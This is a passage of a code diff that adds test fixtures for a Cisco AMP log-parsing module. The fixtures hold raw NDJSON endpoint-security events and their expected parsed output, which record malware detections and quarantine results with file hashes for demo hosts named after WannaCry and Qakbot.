Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} \ No newline 
at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json new file mode 100644 index 000000000000..546e93300ef6 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json 
@@ -0,0 +1,2575 @@ +[ + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064595", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 96000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 0, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 6404, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + 
"related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275390665097297", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 862000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 1522, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + 
"cisco.amp.detection_id": "6419275390665097295", + "cisco.amp.error.description": "Cannot delete", + "cisco.amp.error.error_code": 3221225761, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 659000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 2708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419275390665097296", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 706000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", 
+ "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 5147, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411525251028484105", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], 
+ "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 698000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 9463, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6411525251028484104", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 183000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "6894b3834bd541fa85df79e44568acac", + "file.hash.sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c", + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "MspthrdHash.exe", + 
"file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 12021, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "6894b3834bd541fa85df79e44568acac", + "8cf0ca99a8f5019d8583133b9a9379299c45470c" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419264043361501262", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 14506, + "related.hash": [ 
+ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229331435814969", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 779000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 15718, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802579", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 716000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 16930, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419264043361501261", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": 
"Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 18142, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229322845880359", + "cisco.amp.error.description": "Cannot delete", + "cisco.amp.error.error_code": 3221225761, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 718000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264039066534000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 24355, + "related.hash": [ + 
